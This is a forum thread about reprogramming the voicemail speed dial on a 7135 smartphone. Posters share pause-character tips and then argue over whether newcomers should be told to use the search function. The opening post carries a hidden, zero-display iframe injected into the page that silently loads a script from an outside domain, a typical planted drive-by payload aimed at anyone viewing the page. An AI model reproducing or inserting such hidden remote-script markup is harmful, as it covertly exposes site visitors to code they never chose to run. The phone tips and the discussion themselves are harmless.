+ Reply to Thread
Page 1 of 2 1 2 LastLast

Changing the Preset Voicemail Speed dial on the 7135

Anyone had any luck doing this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Entry #1 can be edited via Settings / VoiceMail in the Messages application.

Go to Messages on the Palm screen, pulldown the messages menu and choose Voicemail - you'll have the ability on the screen to change th voicemail #, and this reflects on the speed dial.

How do you add time spaces...so you can program VM password so you don't have to enter it each time>

Originally posted by Cornholio
    How do you add time spaces...so you can program VM password so you don't have to enter it each time>
    You can use a "," for a timed pause. I believe it is 1/2 second per ",". You can use % for a hard pause. The dialing will pause, and will continue when you hit the OK button.

Alan

More details

The idea of adding the "#" ",,,,,,,,,,'s" to get the phone to automatically enter your password, pause, etc. is great, but no matter what I put in it still dials *86 and waits for me to enter the "#" and my pasword. Can you give some more details about how to do this?

On Verizon, just do "*86,,#password#1". It works great for me!

You 'da man, jaypalay

Thanks jaypalay! It works perfectly!

I do: *86,,#password,,1
    and I also love it.
    ~'kito
    pdaPhoneHome Moderator

'Kito-

Same differnce, except instead of waiting another 2 pauses, the pound speed things up a bit.

Tomaaaayto/Tomahhhto

Programming voicemail into the 7135

I go to speedial and voicemail is listed as 1. but cannot be modified, do i have to go into address book and edit it?

Dreaderus

Re: Programming voicemail into the 7135

Originally posted by dreaderus
    I go to speedial and voicemail is listed as 1. but cannot be modified, do i have to go into address book and edit it?

Dreaderus
    This boards search function is your friend.

http://www.smartphonesource.com/vbul...dial#post46213

alas I am at work and cannot read through alot of material, should I stop posting questions during work? i dont want to clutter up the board with stuff thats trival to experienced people. I only ask these dumb 1 line questions when at work and can only spend a few seconds on the boards

Dreaderus

Originally posted by dreaderus
    alas I am at work and cannot read through alot of material, should I stop posting questions during work? i dont want to clutter up the board with stuff thats trival to experienced people. I only ask these dumb 1 line questions when at work and can only spend a few seconds on the boards

Dreaderus
    Hear Hear Dreaderus!!!

People like alanb are part of the reason why I no longer contribute to this site ... because of their repeated "intolerance" to newbie questions who may or may not have mastered the nuances of the "Search" feature.

Personally, I don't understand WHY people like alanb waste a message slot exhorting newbies to search for their own answers, when they can use that same slot to save the newbie a step or two.

OR -- by using that SAME Search feature, they can see that people like alanb LOVE to trumpet a message milestone which helps NO ONE. To wit:

Post 2000!

DREADERUS -- here's your answer, since alanb is much more interested in touting the search feature (and marking thousand-post milestones) than actually helping ... hit the Messages button (fourth silver button from the left). From there, tap on the top of the Messages banner to bring up the menu, then tap on Voice Mail. From there you can change the number that Speed Dial "1" dials. HOWEVER ... you cannot change the Voice Mail "label". But it'll still dial whatever number you want.

And as for you, alanb ... if you don't want to actually "help" newbies, why not just say nothing? Let someone who IS NOT willing to relegate newbies to the Search button answer the question.

Oh ... and congratulations on your 2000th post alanb! I'm sure you felt an unbelievable amount of pride and fervor when you posted your accomplishment -- I probably felt the same when I received my 7135 in September 2002 ... over one month before you even registered on this site! If you don't believe me, call Karen Hayes at Fleishman-Hillard in San Diego.

alanb ... don't bother replying to this message. I WON'T see it ... anyway, it'll take up a message slot where you COULD tell people to "search".

And moderators ... feel free to delete this post. It won't matter to me. I'm just happy that I was finally able to vent at the elitist attitude of people like alanb.

Lighten up.

People like alanb are part of the reason why I no longer contribute to this site ...
    Dear Otter,

Maybe you should have continued to "no longer contribute". The thread that alanb posted had the answer. It would be different if it was just a flame...

Oh wait, you've got enough gas to flame us all.

no_bones

Administrator
    perhaps its best that you wait until you get home or have time to search to find your answer. some of your questions have already been answered and posting a new thread that has been discussed is cluttering up the site. i hope you don't take this as a disrespect. i am only concerned about keeping the site lean and clutter free for new people to come in to find the info they want.

welcome to the board and enjoy your stay!

Originally posted by marctronixx
    i am only concerned about keeping the site lean and clutter free for new people to come in to find the info they want.
    As a former "newbie" I appreciated being helped along by your folks' efforts. I knew NOTHING about smartphones and this site got me up to speed quickly. If it wasn't for what I've learned here, I would have wasted money on unnecessary products and services.

Alan, in particular has been WONDERFUL by helping me to take advantage of the search feature and even creating new FAQs as they've been suggested. I've made posting mistakes (who hasn't) but no one here ridiculed me so why should anyone ridicule the moderators?

Note: I am not sucking up to none of y'all cuz you are NOT paying my mortgage nor giving me financial advice. I just appreciate everything I've gotten from SPS since I joined last Fall.

Originally posted by Otter
    And moderators ... feel free to delete this post. It won't matter to me. I'm just happy that I was finally able to vent at the elitist attitude of people like alanb.
    LOL... somebody needs to double-check their dosage (or maybe just double it, period).

I would read back through that whole post again to see if I could make some sense of it, but I'm missing the NBA playoffs. My favorite part was the 2,000th post reference. Alan was referring to the crazy number of posts to a particular thread.... Otter thinks he's commenting on a personal achievment. :eyesroll

I think I should e-mail Karen and warn her to keep a very safe distance.........
    Please visit my picture site: Robert-O-Rama :)

I think they have a point

I think Otter and Dreaderus have a point...

Alan does seem to jump rather quickly on the "Use the Search" bandwagon. In the past I have used the search but have been unable to find an answer specific to my situation.

If someone posts a question that has already been asked....well..then...dont read it. I understand Alan's reason for wanting people to use the search, but his method is rather rude IMHO. And folks it's just that.... my opinion.

- Derek

It's tough keeping a balance so the board is useful for the newbies and the people who have hung around for awhile. I think alanb and the moderators have done a great job. Having a question asked and answered numerous times does clutter the board for those who check it often for something new. On the other hand, the search function may not be the first thing a newbie thinks about. Alanb's friendly reminder and gentle pointing in that direction is very appropriate, especially when he goes out of his way to provide the link that does answer the question. Bottom line: this board is a great resource because of people like alanb.